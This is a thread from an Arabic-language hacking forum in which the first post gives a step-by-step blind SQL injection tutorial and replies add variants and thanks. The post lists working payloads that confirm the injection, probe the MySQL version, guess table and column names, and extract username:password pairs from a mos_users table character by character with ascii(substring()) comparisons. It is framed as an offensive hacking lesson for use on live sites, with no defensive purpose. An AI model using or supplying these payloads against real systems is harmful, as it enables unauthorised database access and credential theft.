ترتيب الخطوات للبلايد سكول

[KaLa$nikoV]

ربنا يوفقني​

volcano
بتعلم هكر البلايند
وان شاء الله ينجح بالتعليم​

​

volcano

بقلك فولكانو لا تفكر تخترق بالبلايند اذا ما بتعرف تقليدي​

يلا نتابع​

امر اكتشاف الخطأ​

'

​

2- امر التاكد من ان البلايند يعمل​

and (select 1)=1

3- امر معرفه اصدار القاعده​

and substring(@@version,1,1)=5

and substring(@@version,1,1)=4

4- امر لمعرفه اسم الجدول نستعمل امر​

and (select 1 from table_name limit 0,1)=1

5-​

امر لمعرفه اسم عامود اليوزر والباسوورد نستعمل هذا الامر​

and (select substring(concat(1,column_name),1,1) from table_name limit 0,1)=1​

6- اليوزر نيم والباسورد بحقنه واحده​

and (select substring(concat(1,concat(username,0x3a,password)),1,1) from mos_users limit 0,1)=1

7-

اللعب مع تشفير
ascii
لاستخارج اليوزر والباسورد
فولكانو هكر تابع ​

and ascii(substring((SELECT concat(username,0x3a,password) from mos_users limit 0,1),1,1))>1

هنا نزود باللعبه​

على​

1,1))>1

سطر فولكانو الاحمر انتبه
-------------------volcano--------------------​

1,1))>2

1,1))>3

وهكذا ليطلع لنا الخطا​

ثم بعدها نلعب بنفس الطريقه لكن العد بكون هون​

2,1))>1

ونكمل بزياده على نفس الاسلوب
من عند سطر فولكانو الاحمر
السابق
لحتى يرجع لنا خطا
وهطذا​

الان بس نخلص نجمع الارقام الي تطلع لنا​

ونروح لهذا الموقع​

http://www.commentcamarche.net/co nte nts/base/ascii.php3

لحتى نفك التشفير​

بالتوفيق​

ولا اخو 8898998
يسرق الموضوع لانه فهي اخطاء لسا ما خلصته
بس اخلصه بقلكم الطشوه يا 89088​

​

 

[MrXRoMaNcE1]

يعطيك العافية

اضافة بسيطة لاكتشاف تغرة

+and+1=1

لا يحدث تغير لاكن عندما نضع

+and+1=0

يحدث تغير بصفحة لو بسيط او كبير او ممكن يظهر خطأ هكذا نعرف انها بلايند

وبالنسبة لمعرفة اصدار قاعدة

نضع

AND SUBSTRING(@@version,1,1)=4

اذا تغير محتوى صفحة يعني اصدار ليس 4

نجرب امر تالي

AND SUBSTRING(@@version,1,1)=5

اذا ما تغير هذا يعني انه الاصدار 5

ويعطيك العافية بانتظار جديدك يالغالي ​

 

[KaLa$nikoV]

يسلمو فايروس هكر ع الاضافه والتوضيح بارك الله فيك

 

[actionman2007]

الف الف شكر
الدرس بيساعد على تطبيق الثغره

 

[Tr0j4n]

مشكور فولكانو
مشكور

 

[T3BaN_HaCkEr]

يسلمو يا حجاج

اول مرة بسمع فيها

يلا معاكم نتعلم شوو علينا

 

[ToRn4Do]

يعطيكم العافية شباب مبدعين

مشكور يا فولكانو

اقبل مروري

 

[M!M0]

شـكــ وبارك الله فيك ـــرا لك

 

[Dr.NaNo]

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

 

[مستر داتا بيز]

يسلمو اخى فولكانو
بس لازم تعملنا درس فيديو
لان الحوار ده كده قالب دماغى

مش قادر افكر فيه
ياريت اخى اكرمك الله تعرفلنا ما هو هاكر البلايند والكلام ده

ضرووووووووووووووووووووورى

 

[Prince-Of-Hacker]

الف الف شكر
الدرس بيساعد على تطبيق الثغره

 

[Prince-Of-Hacker]

بس يا ليت تسوي شرح في الفيديو حبيبي بكون اسهل علينا تقبل مروري

 

[DR.THMoORY]

سهلت علينا والله يسلمو حبيبي

 

[Dr.jmjmah]

مشششكور والله يع‘ـطيك العافيه يـآمبـــــــــــدعَ

 

[H3x HaCkeR]

مشكور على الدرس الجميل
لكني عندي ملاحــظــة
الـ Blind SQL فرقها عن الـ SQL injection
شي بسيط الا وهو
الفرق الأساسي والوحيد بين هالنوعين ان الأول لا يظهر ناتج الاستعلامات.. والسبب برمجي لاغير << !!!!
في الثغرة التقليدية, سبب ظهور ارقام الاستغلال او الأعمدة وغيره هو وجود تعليمة print او echo في الكود لطباعة الأعمدة, في حال ماكانت موجودة فرح يظهرلك البلايند وقتها.
يعني لاتعتمد اعتماد كلي على علامــة '

 

[agentsimo]

شكرا لكن الموقع غير شغال http://www.commentcamarche.net/co nte nts/base/ascii.php3

 

[Anti-killer]

شكرا

 

[el-senni]

مشكووووووووووور اخي

 

[ZERO2]

جزاك الله كل خير

 

[c--2]

مشكوووووووووووورر رائع يا شباب